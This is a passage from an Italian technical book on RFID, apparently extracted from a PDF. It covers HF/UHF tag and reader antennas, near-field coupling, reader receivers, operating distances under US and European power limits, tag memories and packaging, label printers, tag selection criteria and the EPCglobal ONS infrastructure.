radiofrequenza per ottimizzare l’impedenza d’ingresso al front end mede-simo e la direttività dell’antenna.I segnali in ingresso UHF ed HF sono separati e condividono un comu-

ne piano di massa.L’antenna può essere costruita con tecnologia da circuito stampato

(PCB), su un unico substrato. Le distanze operative previste dalle specifiche tecniche preliminari di

quest’antenna HF/UHF sono dell’ordine di:- 2 ÷ 10 cm per il funzionamento induttivo a 13,56 MHz (1,5A/m), chefa presagire applicazioni vicine a quelle degli NFC;

- 7 ÷ 9 m per il funzionamento in backscatter alle frequenza europee 867MHz (2W ERP) e americane 915 MHz (4W EIRP), che si collocano trale migliori performance per i TAG passivi su queste frequenze.

Figura II.40Esempio: TAG IntelliSense con antenna

dual-band e sensori

Figura II.41Esempio di antenna dual-band platform

composta da un’antenna PIFA ed un’antennaa spira integrate. Vista 3D

(a sinistra) e planare (a destra)

2-ParteIInew.qxp:RFID 5-09-2008 10:55 Pagina 119

Page 114: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva120

ACCOPPIAMENTO INDUTTIVO IN TAG UHF

In tempi recenti, si sta facendo strada una nuova tecnologia per TAG pas-sivi UHF: lo sfruttamento dell’accoppiamento induttivo in campo vicino,analogamente a quanto avviene per i TAG HF.Si ricorda che la propagazione del campo elettromagnetico presenta

caratteristiche differenti nelle due regioni di cosiddetto “campo vicino” e“campo lontano” (cfr. §II.2.1). L’intensità del campo magnetico diminui-sce rapidamente con la distanza (cfr. §III.3.1); l’accoppiamento induttivo,prevale quindi a brevi distanze (una o due lunghezze d’onda) mentre in“campo lontano” prevale la propagazione del campo elettromagnetico.Tuttavia, entrambe le tipologie di radiazione esistono indipendentementedalla frequenza operativa (che determina però l’estensione delle regioni diprevalenza del campo “vicino” e “lontano”).I TAG HF (13,56 MHz) operano generalmente con accoppiamento

induttivo perchè, a queste lunghezze d’onda, la distanza operativa del“campo vicino” raggiunge e supera il metro; mentre i TAG UHF (860 ÷960 MHz) operano generalmente con accoppiamento elettromagnetico in“campo lontano” raggiungendo distanze operative maggiori. L’antenna dei TAG ad accoppiamento induttivo è realizzata con spire.

Nella banda HF ne vengono generalmente utilizzate 5, affrontando nontrascurabili complicazioni costruttive (valga per tutte, la necessità di rea-lizzare il crossover o ponte – cfr. §II.4.4.1. Ricordando la legge di Faraday si evince che l’effetto dell’accoppia-

mento magnetico, in condizioni di campo vicino, cresce all’aumentaredella frequenza. In particolare nella banda UHF è circa 60 volte maggio-re rispetto alla banda HF. Naturalmente, viste le diverse lunghezze d’on-da, per sfruttare l’effetto “campo vicino” bisogna operare, nella bandaUHF, a distanze molto più piccole che nella banda HF.Sfruttando questo fatto, si è visto che i TAG UHF, se dotati di oppor-

tuna antenna ed operando in prossimità (qualche cm), possono ricavaredall’accoppiamento induttivo una quantità di energia analoga rispetto aquella dei TAG HF.In pratica è possibile utilizzare antenne di piccole dimesioni costituite

da un’unica spira che possono essere realizzate, ad esempio, mediante

II.4.5

2-ParteIInew.qxp:RFID 5-09-2008 10:55 Pagina 120

Page 115: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE II - CARATTERIZZAZIONE E TECNOLOGIE COSTRUTTIVE121

processi di stampa con inchiostri conduttivi (a costi contenuti).Riducendosi drasticamente la dimensione delle antenne, i TAG UHF

funzionanti con accoppiamento induttivo possono assumere dimensioniestremamemente ridotte. In Figura II.42 è riportato il confronto dimen-sionale tra un tradizionale TAG Gen2 ad accoppiamento elettromagneti-co ed un corrispondente Gen2 con accoppiamento induttivo.

Per questa tipologia di TAG, sfruttando l’alto data rate e la maggiorefficienza dei protocolli dei TAG UHF Gen2 si ottengono (per TAG conil solo EPC) velocità di circa 1.000 TAG/s in lettura (considerando datarate ≈640 kbp/s ed overhead dei protocolli anticollisione) e di circa 1.000TAG/min in scrittura, a distanze operative paragonabili a quelle degliNFC (oggetti quasi a contatto con l’antenna del Reader). Il tutto impie-gando gli stessi Reader usati per le letture a distanza, con la sola aggiuntadi antenne speciali (per l’accoppiamento induttivo).Un’ulteriore vantaggiosa caratteristica dell’operare in UHF con accop-

piamento induttivo è quella di rendere il funzionamento del TAG noninfluenzato dalla vicinanza o addirittura dall’immersione in liquidi (cfr.Figura II.43), circostanza che rende tale tipologia di TAG adatta per l’im-piego in applicazioni in cui sia richiesta questa caratteristica.Inoltre, nonostante che nella propagazione in campo lontano le fre-

quenze UHF tendano ad essere riflesse dai metalli, in campo vicino lasituazione è differente ed è possibile che un’antenna opportunamenteprogettata possa sfruttare vantaggiosamente la presenza di superficimetalliche alle quali, ad esempio, il TAG risulta fissato. Tale possibilità èin genere preclusa operando in banda HF.Infine, per operare anche a distanze maggiori della stretta prossimità,

Figura II.42Confronto dimensionale tra un tradizionale

TAG UHF (“Squiggle” Gen 2 - Alien Technology – cfr, Figura II.31) di

dimensioni 97mm x 11mm ed un TAG UHFGen 2 con accoppiamento induttivo di

prossimità, di diametro 9 mm Impinj Inc.

Figura II.43Diversi TAG UHF ad accoppiamento induttivo

(gli oggetti colorati all’interno delcontenitore) che lavorano (in campo vicino)totalmente immersi in un liquido all’interno

di una boccetta Impinj Inc.

2-ParteIInew.qxp:RFID 5-09-2008 10:56 Pagina 121

Page 116: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva122

uno stesso TAG UHF può essere dotato di due antenne distinte per ope-rare sia in campo vicino che in campo lontano (cfr. Figura II.44). Questoapre la strada ad un’integrazione di tecnologie nell’ambito dell’intera“supply chain” in cui, fino ad ora, TAG HF e TAG UHF, per le lorocaratteristiche differenti, erano destinati all’impiego in differenti segmen-ti della stessa.

ANTENNE PER READER DI TAG PASSIVI

Nei sistemi RFID le antenne dei Reader sono componenti di complessaprogettazione.Per applicazioni in prossimità (<10cm) ed a bassa potenza, tipicamen-

te per leggere carte senza contatto e NFC, l’antenna del Reader è integra-ta similmente a quanto avviene per i TAG.Per applicazioni a media distanza (10cm÷1m per HF; <5m per UHF)

(Reader portatili) le antenne sono componenti separati, ma assemblate nelcontenitore del Reader.Per applicazioni a più lunga distanza le antenne sono quasi sempre

esterne.Nella progettazione è necessario specializzare l’antenna per le varie

applicazioni ed ambienti di collocazione. Il progetto delle antenne è radi-calmente differente per le bande UHF o superiori e per quelle LF ed HFa causa del funzionamento ad accoppiamento induttivo in quest’ultime.

Figura II.44Esempio di TAG UHF Gen 2 con doppia

antenna per accoppiamentoelettromagnetico (in campo lontano)

ed induttivo (in campo vicino) Impinj Inc

Figura II.45Nastri di TAG UHF Gen 2, per

l’assemblamento in etichette, con doppiaantenna (a sinistra) e con antenna a singolaspira per accoppiamento induttivo (a destra)

Impinj Inc

II.4.6

2-ParteIInew.qxp:RFID 5-09-2008 10:56 Pagina 122

Page 117: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE II - CARATTERIZZAZIONE E TECNOLOGIE COSTRUTTIVE123

La maggior parte delle antenne per RFID devono essere accordatesulla risonanza alla frequenza operativa. Questo espone il sistema all’in-fluenza di molti fattori esterni che possono de-sintonizzare l’antenna dallafrequenza di risonanza, riducendo la distanza operativa. Le cause sonovarie e dipendenti anche dalla frequenza. Se ne elencano alcune:• Effetto pelle• Perdite dovute a prossimità di masse metalliche• Disadattamento con il cavo d’antenna• Fading del segnale• Prossimità con altre antenne di Reader• Variazioni ambientali• Effetti armonici• Interferenze con altre sorgenti RF• Riflessioni del segnale• Intermodulazioni (cross talk)• Effetti generati dal movimento di una delle due antenne nel campomagnetico generato dall’altra, che genera correnti indotte (di Foucault oEddy current) come in un generatore elettrico. Queste correnti interferi-scono con quelle prodotte dall’accoppiamento induttivo tra TAG eReader.I problemi di de-sintonizzazione causati dai fattori elencati possono

essere minimizzati ricorrendo a circuiti di auto sintonia dinamica che

Figura II.48Reader portatile con lettore/scrittore UHF

Intermec

Figura II.46Selezione di antenne HF Escort Memory System

Figura II.47Selezione di antenne UHF

Symbol Technology

Figura II.49Esempi di antenne HF a polarizzazione

circolare, montate su muletto permovimentazione pallet − Intermec Inc.

2-ParteIInew.qxp:RFID 5-09-2008 10:56 Pagina 123

Page 118: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva124

Figura II.50Esempi di antenne HF a “Portale”

per carico merci

Figura II.51Reader HF su nastro trasportatore,

sistema a tunnelEMS

Figura II.53Esempio di Portale ALX-9010 per TAG UHFGen2, con vista interna – Alien technology

Figura II.52Sistema a portale

EMS

Figura II.54Piattaforma rotante, schema di

funzionamento e realizzazione Symbol

2-ParteIInew.qxp:RFID 5-09-2008 10:56 Pagina 124

Page 119: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE II - CARATTERIZZAZIONE E TECNOLOGIE COSTRUTTIVE125

Tabella II.4Tecniche per superare il problema

della polarizzazione

lavorano sui parametri di sintonia come sistemi in controreazione. Una tecnica adoperata di frequente nelle applicazioni di carico e scari-

co delle merci è quella delle antenne a “Portale”. Un portale prevede unaconfigurazione di antenne in grado di leggere i TAG sugli oggetti chetransitano attraverso di esso. I portali sono spesso previsti per il transitodi pallet (pedane) o per nastri trasportatori; un’altra applicazione moltodiffusa li vede operare all’uscita dei punti vendita come punto di transitoobbligato per i clienti che portano merci acquistate fuori dal locale.Alcune caratteristiche dei portali sono elencate nel seguito.- Spesso nei portali vengono usate antenne a polarizzazione circolare perminimizzare gli effetti dell’orientamento degli oggetti cfr.§III.3.3.4.

- La tecnica dei portali riduce sia la probabilità di leggere TAG indesi-derati sia le interferenze tra porte vicine.

- Con configurazione a portale è possibile leggere il 98,5% dei cartonidotati di TAG sulle pedane che passano attraverso le porte.

- Equipaggiando i portali con sensori di moto si può distinguere automa-ticamente tra il carico (in entrata) e lo scarico (in uscita) delle merci.Un’ulteriore configurazione per lettura di pallet e imballaggi, che pre-

vede costi inferiori rispetto ai portali con antenne multiple, è quella cheprevede che le pallet siano poste su piattaforme rotanti. Le soluzionicommerciali assicurano, con alta probabilità, la lettura della totalità deiTAG contenuti (cfr. Figura II.54).

4.6.1 Polarizzazione delle antenne del Reader

Per quanto riguarda il problema della polarizzazione (cfr. §III.3.3.4), que-sto può essere superato con vari accorgimenti nella realizzazione delleantenne del Reader come illustrato nella tabella seguente.

2-ParteIInew.qxp:RFID 5-09-2008 10:56 Pagina 125

Page 120: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva126

I sistemi di antenna a portale, operano con diverse antenne aventi pola-rizzazioni tra loro ortogonali. Nelle figure è rappresentato, per differenticonfigurazioni delle antenne del portale, un gruppo di tre TAG dispostilungo direzioni tra loro ortogonali.Sono evidenziati in verde i TAG che possono essere letti ed in rosso

quelli che non possono essere letti in ognuna delle configurazioni diantenne.

TECNOLOGIE PER READER DI TAG PASSIVII Reader sono elemento chiave dei sistemi RFID, e le loro caratteristichedevono essere valutate attentamente per il raggiungimento delle presta-zioni previste nel sistema.Fino alla recente ondata di applicazioni pervasive nella catena di distri-

buzione, i Reader di TAG passivi erano principalmente usati per control-lo accessi ed altre applicazioni (sistemi anti taccheggio, ecc.) che compor-tano sia un basso numero di TAG rilevati per ogni interrogazione, sia unbasso numero di dati provenienti dai TAG medesimi. In altri termini l’ap-plicazione tipica erano i portali di lettura entro i quali passava un TAGalla volta o poco più.Ora la situazione sta cambiando, essenzialmente per le esigenze della

catena di distribuzione, per le cui applicazioni vengono letti contempora-neamente tutti i TAG (anche migliaia) contenuti nei colli (scatole, pallet,scaffali, container) in cui la merce è conservata.

Figura II.55Campo ad una dimensione [4]

Figura II.56Campo a due dimensioni [4]

Figura II.57Campo a tre dimensioni [4]

1 - D field,90° tagorientations

2 - D field,90° tagorientations

3 - D field,90° tagorientations

II.5

2-ParteIInew.qxp:RFID 5-09-2008 10:56 Pagina 126

Page 121: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE II - CARATTERIZZAZIONE E TECNOLOGIE COSTRUTTIVE127

Questo ha dato origine ad una nuova generazione di apparati.Si citano alcune delle caratteristiche base dei moderni lettori di TAG

passivi:- Banda di frequenza (principalmente HF o UHF); esistono lettori multibanda

- Versatilità nell’uso di differenti protocolli di comunicazione TAG-Reader (ISO, EPC, proprietari, ecc.); esistono lettori multiprotocollo,ma difficilmente tutti i protocolli sono supportati.

- Supporto delle regolamentazioni differenti nelle diverse aree geografi-che, ad esempio, per la banda UHF si hanno:- Banda di frequenza: 902÷930 MHz negli USA contro 869 MHz inEuropa

- 4 W max negli USA contro 2 W in Europa; va però tenuto in contoil differente riferimento per la misura, ovvero EIRP (USA) = ERP(Europa)*1,64

- Tecnica di comunicazione Reader – TAG (cfr.§IV.4.3):

Figura II.58Reader fisso in banda HF

(Edit ID)

Figura II.59Reader fisso da portale A948EU con supportodi 4 antenne in banda UHF (compatibile Gen2)

CAEN S.p.A., Viareggio

Figura II.60Famiglia di Reader portatili dell’ultima

generazione – PSION TEKLOGIX – WorkaboutPro C ed S – Sistema modulare che può

operare su TAG UHF, HF, LF e carte Mifare,comunica via WLAN e monta sistemi

operativi Window

2-ParteIInew.qxp:RFID 5-09-2008 10:56 Pagina 127

Page 122: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva128

- “Frequency Hopping” negli USA- “Listen Before Talk” in Europa (cfr. §4.3.3)

- Comunicazioni con la rete ed i centri di controllo:- TCP/IP- Wireless LAN- Ethernet LAN- RS 485

- Capacità di gestire i dati:- Gestione di più Reader (con concentratori o middleware)- Interfacce per prodotti middleware esterni- Uscite per sensori o circuiti di controllo

- Capacità di aggiornare il software del Reader (via Internet o via inter-faccia con il sistema di controllo)

- Capacità di gestire più antenne:- Tipicamente 4 antenne per Reader- Metodi di polling o multiplexing dei segnali per o dalle antenne

- Adattamento delle antenne alle condizioni al contorno (auto tuning).

RICEVITORI NEI READER PER TAG PASSIVI

I Reader sono tipicamente strutturati come ricevitori omodina (ricevitoria singola conversione di frequenza).Un oscillatore ad elevata precisione nel Reader genera sia la portante

per il trasmettitore sia la frequenza per la demodulazione (oscillatore loca-le) nel ricevitore.Dopo conversione di frequenza il ricevitore

omodina ottiene (dal segnale ricevuto e modula-to dal TAG tramite backscatter) due segnali inbanda base rispettivamente in fase (I) ed in qua-dratura (Q). Questi vengono dapprima digitaliz-zati (tramite Analog to Digital Converters -ADC) e successivamente elaborati numerica-mente per ricavare le informazioni trasmesse dalTAG.

II.5.1

Figura II.61Schema a blocchi semplificato di un tipico

Reader omodina. A partire da un oscillatorelocale la portante è modulata e trasmessa

al TAG [7]

2-ParteIInew.qxp:RFID 5-09-2008 10:56 Pagina 128

Page 123: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE II - CARATTERIZZAZIONE E TECNOLOGIE COSTRUTTIVE129

II.5.2

Uno degli aspetti più critici è che la trasmissione del Reader dovrebbeavere la stessa frequenza della risposta del TAG e che, a differenza dei tra-dizionali sistemi half duplex in cui la trasmissione si ferma quando il dis-positivo passa nello stato di ricezione, i Reader di TAG passivi devonocontinuare a trasmettere la portante per alimentare il TAG passivo anchedurante la ricezione della risposta del TAG. Le tecniche per minimizzarequesto inconveniente verranno descritte in §IV.2.4.1.L’architettura omodina di un sistema RFID presenta alcune caratteri-

stiche particolari che devono guidarne la progettazione. Ad esempio il ricevitore del Reader, come si vedrà nei paragrafi dedi-

cati alle codifiche, riceve segnali modulati con tecniche che minimizzanoil trasferimento di energia attraverso l’annullamento, nel segnale di back-scatter, della componente a frequenza nulla. In queste condizioni perditedi segnale nei circuiti del Reader possono generare un elevato offset a fre-quenza zero in banda base che può portare in saturazione amplificatori econvertitori A/D.

DISTANZE OPERATIVE READER =>TAG PASSIVI

La distanza operativa in un sistema RFID può essere definita come lamassima distanza alla quale la lettura di TAG raggiunge una determinatapercentuale di successo (in genere molto alta, superiore al 90%). I TAG passivi ricavano tutta la potenza necessaria al loro funzionamen-

to dall’energia dell’onda elettromagnetica a radiofrequenza (generata dal-l’antenna del Reader) assorbita dall’antenna di cui sono dotati. La potenza associata a tale campo elettromagnetico decresce all’au-

mentare della distanza (r) del TAG dall’antenna del Reader, di un fattore1/r2 in campo lontano e 1/r6 in campo vicino. Conseguentemente le distanze a cui si trovano ad operare i TAG hanno

un impatto fondamentale nelle applicazioni dei sistemi RFID. Infatti ilivelli di potenza irradiati che sono ammessi dagli enti regolamentatorinelle differenti zone del pianeta influiscono direttamente sulla distanzaoperativa, abilitando o meno la realizzabilità dell’applicazione.Un ulteriore elemento di complicazione è il fatto che gli organismi di

2-ParteIInew.qxp:RFID 5-09-2008 10:56 Pagina 129

Page 124: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva130

regolamentazione nazionali prescrivono differenti limiti massimi per lapotenza irradiata dal Reader.Anche se i circuiti del TAG, in tecnologia CMOS, necessitano di una

potenza molto bassa per il funzionamento, a distanza di soli pochi metridal Reader la potenza disponibile dal segnale ricevuto è estremamentebassa (-10 ÷ -15 dBm).L’energia disponibile per alimentare il TAG non influisce solamente

sulla distanza alla quale il TAG può essere letto ma anche sul temponecessario a scrivere la memoria flash del TAG medesimo che richiede lagenerazione di tensioni elettriche elevate nel TAG.Gli standard più recenti, avendo riconosciuto l’esistenza di tali proble-

matiche, introducono miglioramenti nelle tecniche di modulazione, dicodifica e nei protocolli, al fine di prevenire situazioni in cui i TAG si tro-vino in carenza di alimentazione.Le tecniche di modulazione più recenti ottengono anche incrementi del

rate di trasferimento dati. Per esempio ISO/IEC18000-6 Type A & Bsono limitati a 160 kb/s mentre la versione Type C può raggiungere velo-cità di 640 kb/s.Nonostante i notevoli sviluppi avuti negli ultimi 10 anni, la potenza

minima richiesta per il funzionamento dei TAGpassivi è solo recentemente scesa nell’intervallotra i 0,2 ed 1 mW.Questi valori, in applicazioni in territorio USA

(potenza massima permessa: 4 W EIRP in UHFmedia), conducono ad una distanza operativa dicirca 5-10 m nella banda UHF media e circa ad 1m nelle bande intorno a 13,56 MHz e 2,4 GHzalle potenze ammesse.La regolamentazione europea è invece molto

più stringente di quella americana limitando lapotenza emessa in banda UHF media a 2 W ERP(3,28 W EIRP), minore di quella ammessa negliStati Uniti, restringendo conseguentemente l’a-rea di lavoro.

Tabella II.5Parametri tipici di un sistema

in banda UHF media

2-ParteIInew.qxp:RFID 5-09-2008 10:56 Pagina 130

Page 125: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE II - CARATTERIZZAZIONE E TECNOLOGIE COSTRUTTIVE131

TECNOLOGIE PER TAG PASSIVI

MEMORIE PER TAG

Dell’importanza della memoria del TAG nelle applicazioni RFID si èdetto più volte. Si ricorda solo che, oltre alla capacità, un ruolo essenzia-le è costituito dal tempo di immagazzinamento dei dati nelle memorie deiTAG passivi e nella capacità di (eventuale) riscrittura delle memorie stes-se da parte dei Reader.I principali tipi di memoria impiegati nei TAG sono: ROM, PROM

(WORM), EEPROM e FRAM.- ROM Read Only Memory. Memoria di sola lettura contenente dati disponibili per la sola consul-tazione; sono registrate in fabbrica attraverso l’incisione laser o l’appo-sita preparazione della maschera del chip.Hanno il vantaggio di occupare, a parità di dati registrati, la minorearea di silicio all’interno del chip, risultando le più economiche.

- PROM Programmable Read Only Memory.Operano la tipica funzione Write-once-read-many (WORM, di cui avolte prendono il nome), sono memorie di sola lettura. Le PROM con-tengono componenti elettronici il cui funzionamento è assimilabile adei fusibili i quali possono essere bruciati secondo le esigenze per scri-vere i dati richiesti. Sono scrivibili una sola volta e richiedono apparec-chiature speciali per le operazioni di scrittura.

- SRAM Static Random Access Memory.Consentono di mantenere le informazioni per un tempo infinito, sonomolto veloci, consumano poco e quindi dissipano poca energia. Lanecessità di usare molti componenti, però, le rende molto costose e dif-ficili da includere in un chip. Sono solitamente usate per le memoriecache, dove elevate velocità e ridotti consumi sono caratteristiche fon-damentali. Vengono a volte impiegate nei TAG attivi.

- EEPROM opp. E2PROM Electrically Erasable Programmable Read-Only Memory.Hanno cicli limitati di lettura/scrittura, il che comporta un utilizzo deiTAG limitato.

II.6

II.6.1

2-ParteIInew.qxp:RFID 5-09-2008 10:56 Pagina 131

Page 126: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva132

La EEPROM (Electrically Erasable and Programmable ROM), a diffe-renza di una semplice ROM è cancellabile e riscrivibile, medianteopportune tensioni e correnti applicate ai MOSFET (i componentibase della memoria) che la compongono. Richiedono però voltaggi relativamente alti, hanno un consumo relati-vamente maggiore e tempi più lunghi per le operazioni di lettu-ra/scrittura; richiedono anche una maggiore area di silicio sul chip epertanto sono più costose.Le capacità di memoria EEPROM variano fino ad oltre 100 Kbyte;possono sopportare fino a 100.000 cicli di lettura/scrittura e possonoconservare un dato scritto fino a 10 anni.

- FRAM Ferroelectric RAM.Le FRAM costituiscono un notevole progresso rispetto alle EEPROM.Possono memorizzare dati per un lungo periodo di tempo e richiedo-no basso voltaggio ed offrono grande resistenza ai cicli di lettu-ra/scrittura (numero illimitato di cicli lettura/scrittura) con alta veloci-tà di scrittura. Tipicamente offrono velocità di trasferimento dati fino a424 kbps; tempi rapidi di lettura e scrittura (meno di 200ns) e corren-te estremamente bassa (alcuni microamp); forniscono un'elevatissimaaffidabilità e tempi di conservazione dei dati superiori a 10 anni.

CONTENITORI PER TAG ED ASSEMBLAGGIO

I TAG sono costruiti in una grande varietà di contenitori, progettati perambienti ed applicazioni differenti.Nel tipico TAG etichetta, chip ed antenna sono generalmente inseriti

tra un substrato di materiale plastico ed una copertura di carta, ma sonopossibili molte altre soluzioni, dal bullone al bottone, fino al tappo (in pla-stica) per bottiglie di vino.Vengono usati vari processi di assemblaggio (descritti in dettaglio in §

II.3) nonché una grande varietà di contenitori che danno luogo ad assem-blaggi di TAG per usi diversi. Tra i formati di assemblaggio più comuni,si ricordano:• Tessere (tipo Carta di credito);

II.6.2

2-ParteIInew.qxp:RFID 5-09-2008 10:56 Pagina 132

Page 127: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE II - CARATTERIZZAZIONE E TECNOLOGIE COSTRUTTIVE133

• Etichette flessibili adesive;• TAG su carta;• Contenitori tipo gettoni e monete;• TAG iniettati o modellati in contenitori e prodotti di plastica;• TAG su cinturini da polso (usi ospedalieri);• TAG ad alta robustezza in contenitore epossidico sigillato;• TAG su chiavi;• TAG per grandi contenitori (pallet, container, ecc.).

Figura II.62Biglietto elettronico

Figura II.63Biglietti della metropolitana di Mosca

UPM Raflatac

Figura II.64TAG HF per PosteItaliane

EMS (Escort Memory Systems) gruppo Datalogic (Italia)

Figura II.65Etichette flessibili HF

EMS (Escort Memory Systems) gruppo Datalogic (Italia)

2-ParteIInew.qxp:RFID 5-09-2008 10:56 Pagina 133

Page 128: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva134

Figura II.66TAG su cinturino da polso

per applicazioni ospedaliere

Figura II.67TAG HF incorporato in tappo

per bottiglie di vino LAB ID (Italia)

Figura II.68TAG “keytags” (chiave elettronica)

http://www.daelibs.com.au/

Figura II.69TAG HF incorporato in bullone per uso

automubilistico (Ford) - EMS (Escort MemorySystems) - gruppo Datalogic (Italia)

Figura II.70Car Immobilizer

Texas Instruments

2-ParteIInew.qxp:RFID 5-09-2008 10:56 Pagina 134

Page 129: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE II - CARATTERIZZAZIONE E TECNOLOGIE COSTRUTTIVE135

Figura II.73Telepass per le autostrade italiane;

TAG attivo sulle frequenza 5,795-5,815 GHz

Figura II.74TAG per identificazione di animali;da inserire nello stomaco dei bovini tipo grande: l= 6,5 cm; diam.= 2 cm; tipo piccolo: l= 6,5 cm: diam.= 1,5 cm

Figura II.75Chip RFID con antenna incorporata (Hitachi)Un nuovo sviluppo nella tecnica di assemblag-gio dei TAG prevede che l’antenna venga depo-sitata direttamente sulla superfice del chip con-

tenente il circuito elettronico. La tecnologia,proposta sia in HF che in UHF, offre una distan-za di comunicazione di soli 3 mm, ma offre unTAG microscopico che può essere celato in luo-

ghi impensabili (tipicamente banconote).

Figura II.71TAG HF per lavanderie

EMS (Escort Memory Systems) gruppo Datalogic (Italia)

Figura II.72TAG per identificazione di animali;

da applicare sulle orecchie di bovini;diametro 3cm

Si ricorda infine lo scenario futuro (cfr. § II.3.1.4), che prevede unaconsiderevole riduzione dei costi del TAG, prevedendo l’antenna stampa-ta direttamente sull’oggetto destinatario del TAG ed il chip RFID assem-blato su un modulo incollato a sua volta sull’oggetto ed accoppiato all’an-tenna senza contatto elettrico.

2-ParteIInew.qxp:RFID 5-09-2008 10:56 Pagina 135

Page 130: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva136

Figura II.76Stampante RFID a trasferimento termico

Toshiba, mentre stampa TAG UHF UPM Raflatac

Figura II.77Stampante Intermec

Figura II.78R110Xi Stampante HF/UHF secondo configurazione Zebra Technologies Inc

Figura II.79Stampante per etichette - Toshiba

6.2.1 Stampanti di etichette RFID

Le stampanti specializzate per etichette con RFID (passivi) sono macchi-ne costruite per stampare l’etichetta e contemporaneamente programma-re la memoria dell’RFID.Le stampanti possono programmare RFID in HF, UHF o entrambe e

possono verificare gli RFID non correttamente programmati e scartarli.

2-ParteIInew.qxp:RFID 5-09-2008 10:56 Pagina 136

Page 131: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE II - CARATTERIZZAZIONE E TECNOLOGIE COSTRUTTIVE137

PARAMETRI PER LA SCELTA DI UN TAG

Si riporta qui di seguito un elenco delle caratteristiche principali da tenere inconto per la scelta di un TAG nell’ambito di un particolare sistema RFID:• dimensioni e forma (in relazione alla collocazione del TAG);• distanze reciproche dei TAG;• durata (eventuale necessità di avere una protezione esterna robustacontro usura e rotture);

• riutilizzabilità;• resistenza in ambienti critici (corrosivi, ad alta pressione, ecc.);• polarizzazione (orientazione del TAG rispetto al campo del Reader);• intervalli di temperatura in cui è previsto il funzionamento;• distanza di comunicazione tra TAG e Reader;• influenza da parte di eventuali materiali metallici e liquidi;• ambiente operativo (presenza di rumore elettrico, presenza di altriapparati radio, ecc);

• frequenze operative (LF, HF o UHF);• standard e protocolli di comunicazioni supportati (ISO, EPC);• soddisfacimento di regolamentazioni regionali (USA, Europa, Asia);• ammontare dei dati da memorizzare nel TAG (eventualmente più di ununico identificativo di prodotto EPC);

• caratteristiche anticollisione (numero massimo di TAG nel range dioperabilità e velocità di identificazione);

• velocità dei TAG all’interno del campo del Reader;• supporto di Reader (quali prodotti Reader sono in grado di leggere iTAG);

• necessità di protezione dei dati del TAG (eventuale necessità di cifratura).

II.7

Figura II.80Logica di definizione di TAG passivi [4]

2-ParteIInew.qxp:RFID 5-09-2008 10:56 Pagina 137

Page 132: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva138

INFRASTRUTTURE INFORMATIVE PER SISTEMI RFID

La funzionalità di un sistema RFID, è in gran parte, dipendente dall’infra-struttura informativa associata al sistema medesimo. In particolare i siste-mi che trattano EPC (Electronic Product Code) (cfr.§IX.2.1), sono sem-pre più frequentemente interconnessi a reti IP, sia a Intranet private siaall’Internet pubblica.La politica per gestire gli identificatori RFID è simile alla gestione dei

nomi in ambiente IP: fondamentalmente gli identificatori devono essereunici e tale unicità richiede un coordinamento.Una celebre proposta di architettura di sistema RFID è stata sviluppa-

ta da EPCglobal. Cardine di questa architettura è il servizio Object NameService (ONS).Dato che i TAG “Etichette intelligenti” associati ai singoli oggetti

memorizzano, in genere, solamente l’EPC dell’oggetto medesimo, il servi-zio ONS collega l’EPC letto da un TAG con le informazioni specifiche delprodotto associato a quel TAG.Quindi l’ONS stabilisce il collegamento tra una risorsa fisica (identifica-

ta dal TAG che trasmette l’EPC) e la relativa informazione (che è format-tata mediante il cosiddetto Physical Mark-up Language o PML) attraversoInternet. L’informazione su un prodotto può consistere di dettagli sul pro-dotto medesimo, altri dati o dettagli sull’origine e la storia della merce.Questo servizio Object Name Service (ONS) è molto simile al servizio

della rete Internet chiamato Domain Name Service (DNS). Il DNS for-nisce l’indirizzo IP (una serie di numeri) del computer che contiene i datia partire da un indirizzo simbolico denominato URL (Uniform ResourceLocator).L’ONS gestisce la corrispondenza tra gli EPC e gli URL.Lo scopo dell’infrastruttura per la gestione dell’EPC è di consentire

l’immediato accesso all’informazione, non solo allo scopo di ottimizzare iservizi esistenti quali l’ASN (Advance Shipping Notice) (cfr. appendice suEPC e codici a barre), ma anche la creazione di nuovi servizi ad esempiol’attivazione di “offerte speciali”, quando si approssima la data di scaden-za del prodotto, oppure il richiamo automatico in fabbrica di stock diprodotti da parte del fabbricante.

II.8

2-ParteIInew.qxp:RFID 5-09-2008 10:56 Pagina 138

Page 133: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE II - CARATTERIZZAZIONE E TECNOLOGIE COSTRUTTIVE139

